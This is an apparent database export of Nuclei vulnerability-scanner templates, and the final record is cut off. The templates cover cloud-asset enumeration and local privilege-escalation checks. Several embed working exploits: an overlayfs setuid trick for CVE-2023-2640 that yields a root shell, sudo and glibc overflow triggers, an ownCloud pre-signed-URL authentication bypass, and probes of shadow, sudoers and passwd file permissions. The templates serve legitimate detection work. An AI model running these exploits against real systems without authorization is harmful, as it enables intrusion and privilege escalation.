[{ "_id": { "$oid": "66477a413521042ccf307c23" }, "name": "aws-app-enum.yaml", "content": "id: aws-app-enum\n\ninfo:\n name: AWS Apps - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for AWS apps (WorkDocs, WorkMail, Connect, etc.)\n metadata:\n verified: true\n max-request: 1\n tags: cloud,enum,cloud-enum,aws\n\nself-contained: true\n\nvariables:\n BaseDNS: \"awsapps.com\"\n\nhttp:\n - raw:\n - |\n GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers:\n - type: status\n name: \"Registered AWS App\"\n status:\n - 200\n - 302\n condition: or\n# digest: 490a0046304402200ead17d9381546ddc9f16663c90d8511969313ccc238f43ffde6040eb1190a3e02204f529c738530581af958cd8d83110cdb30cfc8f14818c8a379fb398f975045f8:922c64590222798bb761d5b6d8e72950", "hash": "da1370cd96eea5e35c4e67da1d0224cd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c24" }, "name": "aws-s3-bucket-enum.yaml", "content": "id: aws-s3-bucket-enum\n\ninfo:\n name: AWS S3 Buckets - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for open and protected buckets in AWS S3\n metadata:\n verified: true\n max-request: 1\n tags: cloud,enum,cloud-enum,aws\n\nself-contained: true\n\nvariables:\n BaseDNS: \"s3.amazonaws.com\"\n\nhttp:\n - raw:\n - |\n GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers-condition: or\n matchers:\n - type: status\n name: \"Open AWS S3 Bucket\"\n status:\n - 200\n\n - type: status\n name: \"Protected AWS S3 Bucket\"\n status:\n - 403\n# digest: 4a0a004730450220582ade4cedc87128700ecd6eabbf8180f003175a526353e667cd067c00860403022100dadcb4551ca3a0cefd88cb78fa0de85020778f6b3c85f7792aee521e3c8adfaf:922c64590222798bb761d5b6d8e72950", "hash": "3e224ade18b918ecb3d343fc1ac90ddb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c25" }, "name": "azure-db-enum.yaml", "content": "id: azure-db-enum\n\ninfo:\n name: Azure Databases - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for Azure databases via their registered DNS names\n metadata:\n verified: true\n max-request: 1\n tags: cloud,enum,cloud-enum,azure\n\nself-contained: true\n\nvariables:\n BaseDNS: \"database.windows.net\"\n\ndns:\n - name: \"{{wordlist}}.{{BaseDNS}}\"\n type: A\n class: inet\n\n recursion: true\n\n attack: batteringram\n matchers:\n - type: word\n part: answer\n words:\n - \"IN\\tA\"\n# digest: 4a0a0047304502206a999e317308128dc9a9f3114f003b2c29cad9f569d6922502a8ac90971cf927022100c4fe9eea1496997e9ef66f8a46c2ece4bd511dede88aaf58d36410be3f2cc758:922c64590222798bb761d5b6d8e72950", "hash": "7668daf3eeacc6f6178f457f7793fc0a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c26" }, "name": "azure-vm-cloud-enum.yaml", "content": "id: azure-vm-cloud-enum\n\ninfo:\n name: Azure Virtual Machines - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for Azure virtual machines via their registered DNS names.\n metadata:\n verified: true\n max-request: 1\n tags: cloud,cloud-enum,azure,fuzz,enum\n\nself-contained: true\n\nvariables:\n BaseDNS: \"cloudapp.azure.com\"\n regionname:\n - eastasia\n - southeastasia\n - centralus\n - eastus\n - eastus2\n - westus\n - northcentralus\n - southcentralus\n - northeurope\n - westeurope\n - japanwest\n - japaneast\n - brazilsouth\n - australiaeast\n - australiasoutheast\n - southindia\n - centralindia\n - westindia\n - canadacentral\n - canadaeast\n - uksouth\n - ukwest\n - westcentralus\n - westus2\n - koreacentral\n - koreasouth\n - francecentral\n - francesouth\n - australiacentral\n - australiacentral2\n - southafricanorth\n - southafricawest\n\ndns:\n - name: \"{{wordlist}}.{{regionname}}.{{BaseDNS}}\"\n type: A\n class: inet\n\n recursion: true\n\n attack: batteringram\n\n matchers:\n - type: word\n part: answer\n words:\n - \"IN\\tA\"\n# digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950", "hash": "62672f03d5615191ba7f8677a454e234", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c27" }, "name": "azure-website-enum.yaml", "content": "id: azure-website-enum\n\ninfo:\n name: Azure Websites - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for Azure websites that are registered and responding.\n metadata:\n verified: true\n max-request: 1\n tags: cloud,enum,azure\n\nself-contained: true\n\nvariables:\n BaseDNS: \"azurewebsites.net\"\n\nhttp:\n - raw:\n - |\n GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers:\n - type: status\n name: \"Available Azure Website\"\n status:\n - 200\n - 302\n condition: or\n# digest: 4a0a0047304502201886de38da3a1bc0e95ff00b7cbf1e6cb0ef6f13197aa042a25d3a4f1ee588ad022100e067b58657d10e3b2d41283022c15120ed1d17f20d58b821418e953bfbfe2b0f:922c64590222798bb761d5b6d8e72950", "hash": "213edbdfa78256665fb3ce8c830a31f2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c28" }, "name": "gcp-app-engine-enum.yaml", "content": "id: gcp-app-engine-enum\n\ninfo:\n name: GCP App Engine (Appspot) - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for App Engine Apps in GCP.\n metadata:\n verified: true\n max-request: 1\n tags: enum,cloud,cloud-enum,gcp\n\nself-contained: true\n\nvariables:\n BaseDNS: \"appspot.com\"\n loginRedirect: \"accounts.google.com\"\n\nhttp:\n - raw:\n - |\n GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers:\n - type: dsl\n name: \"Open GCP App Engine App\"\n dsl:\n - \"status_code==200\"\n\n - type: dsl\n name: \"Protected GCP App Engine App\"\n dsl:\n - \"status_code==302\"\n - contains(location, \"login\")\n condition: and\n# digest: 490a00463044022049b2ab788a102342c3ee4b36d87315f145c3e963f1bd8389d1b2d9f90540f05402203bb1fa138a4e29c568c6bd421cb97c526e822c25fc952368295259787bc159d4:922c64590222798bb761d5b6d8e72950", "hash": "e9be701ba0367556336e1bac2300ccca", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c29" }, "name": "gcp-bucket-enum.yaml", "content": "id: gcp-bucket-enum\n\ninfo:\n name: GCP Buckets - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for open and protected buckets in GCP.\n metadata:\n verified: true\n max-request: 1\n tags: cloud,enum,cloud-enum,gcp\n\nself-contained: true\n\nvariables:\n BaseDNS: \"storage.googleapis.com\"\n\nhttp:\n - raw:\n - |\n GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers:\n - type: status\n name: \"Open GCP Bucket\"\n status:\n - 200\n\n - type: status\n name: \"Protected GCP Bucket\"\n status:\n - 403\n# digest: 4a0a00473045022038ad1830fc8e77debc4c9fcab4d7eb4c62b9930c3f98860f5e6877c1e72578a4022100e3ea9b5730d32e9219e4716c79b5203733ff802460ee921d0f0c2199ecca7989:922c64590222798bb761d5b6d8e72950", "hash": "bed4f0f05be71ff100b570ac4b7d6ebc", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2a" }, "name": "gcp-firebase-app-enum.yaml", "content": "id: gcp-firebase-app-enum\n\ninfo:\n name: GCP Firebase Apps - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for Firebase Apps in GCP.\n metadata:\n verified: true\n max-request: 1\n tags: enum,cloud,cloud-enum,gcp\n\nself-contained: true\n\nvariables:\n BaseDNS: \"firebaseapp.com\"\n\nhttp:\n - raw:\n - |\n GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers:\n - type: status\n name: \"Open GCP Firebase App\"\n status:\n - 200\n# digest: 4a0a0047304502202cb00f1926f91f36e3db3668c74866756cfda2081ea2a15ae99606c13542a8d3022100e57e4412254764ae84c84ff3fbf3932c79895e187f380a33749e25519df189f5:922c64590222798bb761d5b6d8e72950", "hash": "b64e097c51c058ce01d98468867e5af2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2b" }, "name": "gcp-firebase-rtdb-enum.yaml", "content": "id: gcp-firebase-rtdb-enum\n\ninfo:\n name: GCP Firebase Realtime Database - Cloud Enumeration\n author: initstring\n severity: info\n description: |\n Searches for Firebase Realtime Databases in GCP.\n metadata:\n verified: true\n max-request: 1\n tags: enum,cloud,cloud-enum,gcp\n\nself-contained: true\n\nvariables:\n BaseDNS: \"firebaseio.com\"\n\nhttp:\n - raw:\n - |\n GET https://{{wordlist}}.{{BaseDNS}}/.json HTTP/1.1\n Host: {{wordlist}}.{{BaseDNS}}\n\n redirects: false\n\n attack: batteringram\n threads: 10\n\n matchers-condition: or\n matchers:\n - type: status\n name: \"Open GCP Firebase RTDB\"\n status:\n - 200\n\n - type: status\n name: \"Protected GCP Firebase RTDB\"\n status:\n - 401\n\n - type: status\n name: \"Payment GCP on Google Firebase RTDB\"\n status:\n - 402\n\n - type: status\n name: \"Deactivated GCP Firebase RTDB\"\n status:\n - 423\n# digest: 4b0a00483046022100c5f895d4aa3a88d0917500200d33cf6c779e563a27cfcb1c1849c6740af720b30221009b12087b38af6b723bd3add8f08dd28e76b18133a03396b5d1af3693bfbdcecc:922c64590222798bb761d5b6d8e72950", "hash": "fbffebf468c007db46d657a3a1c0c632", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2c" }, "name": "CVE-2019-14287.yaml", "content": "id: CVE-2019-14287\n\ninfo:\n name: Sudo <= 1.8.27 - Security Bypass\n author: daffainfo\n severity: high\n description: |\n In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a \"sudo -u \\#$((0xffffffff))\" command.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287\n - https://www.exploit-db.com/exploits/47502\n - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html\n - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html\n - http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2019-14287\n cwe-id: CWE-755\n epss-score: 0.30814\n epss-percentile: 0.96854\n cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: sudo_project\n product: sudo\n tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo -u#-1 whoami\n\n matchers:\n - type: dsl\n dsl:\n - '!contains(code_1_response, \"root\")'\n - 'contains(code_2_response, \"root\")'\n condition: and\n# digest: 4a0a0047304502204e166f9afc32a9e3f2aa20cf10f4dc7c4ccc6d9ecfb25279db42ee4884fd9a09022100e24c0145e3cb670939ecba31b847513224c52277827290d7358cd3b5e8531825:922c64590222798bb761d5b6d8e72950", "hash": "c35ca732bcdee45595ae96f18ecf8932", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2d" }, "name": "CVE-2021-3156.yaml", "content": "id: CVE-2021-3156\n\ninfo:\n name: Sudo Baron Samedit - Local Privilege Escalation\n author: pussycat0x\n severity: high\n description: |\n Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via \"sudoedit -s\" and a command-line argument that ends with a single backslash character.\n reference:\n - https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435\n - https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit\n - https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff\n - http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html\n - http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2021-3156\n cwe-id: CWE-193\n epss-score: 0.97085\n epss-percentile: 0.99757\n cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n vendor: sudo_project\n product: sudo\n tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n sudoedit -s '\\' $(python3 -c 'print(\"A\"*1000)')\n\n matchers:\n - type: word\n words:\n - \"malloc(): memory corruption\"\n - \"Aborted (core dumped)\"\n condition: and\n# digest: 4a0a0047304502204de6d29ee97c296f1046225fd664237cb80c163370f316bfa2c0174718fa0654022100cbd49f46b75314934af75dde946dbe4a3d135d87368f2dead3b9b2fa40bb839b:922c64590222798bb761d5b6d8e72950", "hash": "c694cd382462ab55990b9c6ee1f1091c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2e" }, "name": "CVE-2023-2640.yaml", "content": "id: CVE-2023-2640\n\ninfo:\n name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel\n author: princechaddha\n severity: high\n description: |\n A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.\n impact: |\n An attacker with local access can gain elevated privileges on the affected system.\n remediation: |\n Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.\n reference:\n - http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640\n - https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability\n - https://ubuntu.com/security/notices/USN-6250-1\n - https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2023-2640\n cwe-id: CWE-863\n epss-score: 0.00232\n epss-percentile: 0.60636\n cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: canonical\n product: ubuntu_linux\n tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n id\n\n - engine:\n - sh\n - bash\n source: |\n cd /tmp\n echo '#include \\n#include \\n#include \\n\\nint main() {\\n if (setuid(0) != 0) {\\n fprintf(stderr, \"\\\\x1b[31mFailed to set UID to 0.\\\\x1b[0m\\\\n\");\\n return 1;\\n }\\n\\n printf(\"Entering \\\\x1b[36mprivileged\\\\x1b[0m shell...\\\\n\");\\n if (system(\"/bin/bash -p\") == -1) {\\n fprintf(stderr, \"\\\\x1b[31mFailed to execute /bin/bash -p.\\\\x1b[0m\\\\n\");\\n return 1;\\n }\\n\\n return 0;\\n}' > test.c\n gcc test.c -o test\n unshare -rm sh -c \"mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;\"\n\n matchers:\n - type: dsl\n dsl:\n - '!contains(code_1_response, \"(root)\")'\n - 'contains(code_2_response, \"(root)\")'\n condition: and\n# digest: 490a004630440220115656a336b2d20b4c44fe1ade030de40d947cf0fd7fb8f8a5a910dca2ab200602205ead45f6f081b3555a7924050cd922e13d30139e64254790b1368627d59b4389:922c64590222798bb761d5b6d8e72950", "hash": "cfec3b3b0c44bd8d808d5f7b0cd562dd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c2f" }, "name": "CVE-2023-49105.yaml", "content": "id: CVE-2023-49105\n\ninfo:\n name: OwnCloud - WebDAV API Authentication Bypass\n author: ChristianPoeschl,FlorianDewald,usdAG\n severity: critical\n description: |\n An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.\n reference:\n - https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/\n - https://github.com/0xfed/ownedcloud\n - https://owncloud.org/security\n - https://github.com/ambionics/owncloud-exploits\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-49105\n cwe-id: CWE-287\n epss-score: 0.21237\n epss-percentile: 0.96302\n cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: owncloud\n product: owncloud\n shodan-query: title:\"owncloud\"\n tags: cve,cve2023,code,owncloud,auth-bypass\nvariables:\n username: admin\n\ncode:\n - engine:\n - py\n - python3 # requires python to be pre-installed on system running nuclei\n source: |\n # build signature for presigned urls\n import base64, hashlib, datetime, os\n from urllib.parse import urlencode\n\n username = os.getenv('username')\n base_url = os.getenv('BaseURL')\n dav_url = f'{base_url}/remote.php/dav/files/{username}'\n oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')\n data = {\n 'OC-Expires': '991200',\n 'OC-Verb': 'PROPFIND',\n 'OC-Credential': username,\n 'OC-Date': oc_date\n }\n sig_url = f'{dav_url}?{urlencode(data)}'\n # derive signature from empty sign key\n dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)\n final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'\n #final_url = f'{sig_url}&OC-Signature={dk.hex()}'\n print(final_url)\n\nhttp:\n - raw:\n - |\n PROPFIND {{code_response}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n Authorization: Basic {{base64('{{username}}')}}\n\n matchers-condition: or\n matchers:\n - type: dsl\n name: bypass-correct-user\n dsl:\n - status_code == 207\n - contains(body, 'owncloud.org')\n condition: and\n\n - type: word\n name: bypass-wrong-user\n part: body\n words:\n - User unknown\n - Sabre\n - Exception\n - NotAuthenticated\n condition: and\n\n extractors:\n - type: dsl\n dsl:\n - '\"Username => \"+ username'\n# digest: 490a00463044022036740507180fa43831d3d59a5ccaae05fa1108c27c42a19564fa3f0fc5da439f02205a94a9cbb26731a679d9d39a80c72ff0ff1c48346680963d6aa05f94de9b2e95:922c64590222798bb761d5b6d8e72950", "hash": "fb12b8267ed57508da9561b4c4d331ac", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c30" }, "name": "CVE-2023-4911.yaml", "content": "id: CVE-2023-4911\n\ninfo:\n name: Looney Tunables Linux - Local Privilege Escalation\n author: nybble04\n severity: high\n description: |\n A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2023-4911\n - https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt\n - https://www.youtube.com/watch?v=1iV-CD9Apn8\n - http://www.openwall.com/lists/oss-security/2023/10/05/1\n - http://www.openwall.com/lists/oss-security/2023/10/13/11\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2023-4911\n cwe-id: CWE-787,CWE-122\n epss-score: 0.0171\n epss-percentile: 0.87439\n cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gnu\n product: glibc\n tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n env -i \"GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A\" \"Z=`printf '%08192x' 1`\" /usr/bin/su --help\n echo $?\n\n matchers:\n - type: word\n words:\n - \"139\" # Segmentation Fault Exit Code\n# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950", "hash": "f8c83690517eae753a268f613a29a995", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c31" }, "name": "CVE-2023-6246.yaml", "content": "id: CVE-2023-6246\n\ninfo:\n name: glibc's syslog - Local Privilege Escalation\n author: gy741\n severity: high\n description: |\n A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2023-6246\n - https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt\n - https://access.redhat.com/security/cve/CVE-2023-6246\n - https://bugzilla.redhat.com/show_bug.cgi?id=2249053\n - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2023-6246\n cwe-id: CWE-787,CWE-122\n epss-score: 0.0077\n epss-percentile: 0.80859\n cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gnu\n product: glibc\n tags: cve,cve2023,code,glibc,linux,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n (exec -a \"`printf '%0128000x' 1`\" /usr/bin/su < /dev/null)\n echo $?\n\n matchers:\n - type: word\n words:\n - \"127\" # Segmentation Fault Exit Code\n# digest: 490a0046304402204e884ed16aed759a6b31c001e50ee4aed4db45f060d3335e1b6f28935eae4135022051929119a0bf2eac944500d98af2720a6ff835dcb875f35cc6390fbdf47c8bda:922c64590222798bb761d5b6d8e72950", "hash": "944ef6f13032d6bb7990e3f547996e4c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c32" }, "name": "rw-shadow.yaml", "content": "id: rw-shadow\n\ninfo:\n name: /etc/shadow writable or readabel - Privilege Escalation\n author: daffainfo\n severity: high\n reference:\n - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow\n metadata:\n verified: true\n max-request: 2\n tags: code,linux,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n [ -r \"/etc/shadow\" ] || [ -w \"/etc/shadow\" ] && echo \"Either readable or writable\" || echo \"Not readable and not writable\"\n\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: word\n part: code_2_response\n words:\n - \"Either readable or writable\"\n\n - type: word\n part: code_2_response\n words:\n - \"Not readable and not writable\"\n negative: true\n# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950", "hash": "c67b7de93a4863f2e7f6d282d88f2713", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c33" }, "name": "rw-sudoers.yaml", "content": "id: rw-sudoers\n\ninfo:\n name: /etc/sudoers writable or readable - Privilege Escalation\n author: daffainfo\n severity: high\n reference:\n - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#etc-sudoers-etc-sudoers.d\n metadata:\n verified: true\n max-request: 2\n tags: code,linux,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n [ -r \"/etc/sudoers\" ] || [ -w \"/etc/sudoers\" ] && echo \"Either readable or writable\" || echo \"Not readable and not writable\"\n\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: word\n part: code_2_response\n words:\n - \"Either readable or writable\"\n\n - type: word\n part: code_2_response\n words:\n - \"Not readable and not writable\"\n negative: true\n# digest: 4b0a00483046022100caa6257df894b71a7e77b620941ef821acfbf9ae0c939bab9bb60111a29be594022100fb1579caf8b9cdbcb2866aa421ee0cb34d429d2657544be9c2d8652bc196df39:922c64590222798bb761d5b6d8e72950", "hash": "5a0c165f5632a321aeff5b497c037175", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c34" }, "name": "sudo-nopasswd.yaml", "content": "id: sudo-nopasswd\n\ninfo:\n name: Sudo NOPASSWD - Privilege Escalation\n author: daffainfo\n severity: high\n description: Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password.\n reference:\n - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#nopasswd\n metadata:\n verified: true\n tags: code,linux,sudo,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n sudo -l\n\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"(root) NOPASSWD:\"\n# digest: 4a0a00473045022100de6ba465a1014a68bf361233db593957b6412aa0496a46cc569184eedd84611702203545ae3f61902e6068aff724e05ec287f68ad332ccf73aa02ec78d1800429f24:922c64590222798bb761d5b6d8e72950", "hash": "2760830bb2c0c3a35d3fb6ce4bcc3168", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c35" }, "name": "writable-etc-passwd.yaml", "content": "id: writable-etc-passwd\n\ninfo:\n name: /etc/passwd writable - Privilege Escalation\n author: daffainfo\n severity: high\n reference:\n - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-passwd\n metadata:\n verified: true\n tags: code,linux,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n [ -w \"/etc/passwd\" ] && echo \"Writable\" || echo \"Not writable\"\n\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"Writable\"\n\n - type: word\n part: code_1_response\n words:\n - \"Not writable\"\n negative: true\n# digest: 4a0a0047304502210096579c1feb0a90bdbb55acc382213a07ed99678c1afdaa1849273657d6292d3c02200903d3d37e2aafed546ff3b5259ecaa046cac660ae9acadb109f4dc694c4a81d:922c64590222798bb761d5b6d8e72950", "hash": "6ec81c2f7b3ce1ef40bec2b550c316ad", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c36" }, "name": "privesc-aa-exec.yaml", "content": "id: privesc-aa-exec\n\ninfo:\n name: aa-exec - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n aa-exec is used to launch a program confined by the specified profile and or namespace.\n reference:\n - https://gtfobins.github.io/gtfobins/aa-exec/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,aa-exec,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n aa-exec whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo aa-exec whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100ab308d9c3e5fbd837b8ae53da47b7f62caaa8b17838d684823649b04c05a180302203b4a417eabdb724ef1b07af57b4a15ca02f59f665442d6c145a869026e0ff3ac:922c64590222798bb761d5b6d8e72950", "hash": "675a11a47a0be08ca444642bcf4af8d5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c37" }, "name": "privesc-ash.yaml", "content": "id: privesc-ash\n\ninfo:\n name: Ash - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Ash allows the value of a variable to be set at the same time it is 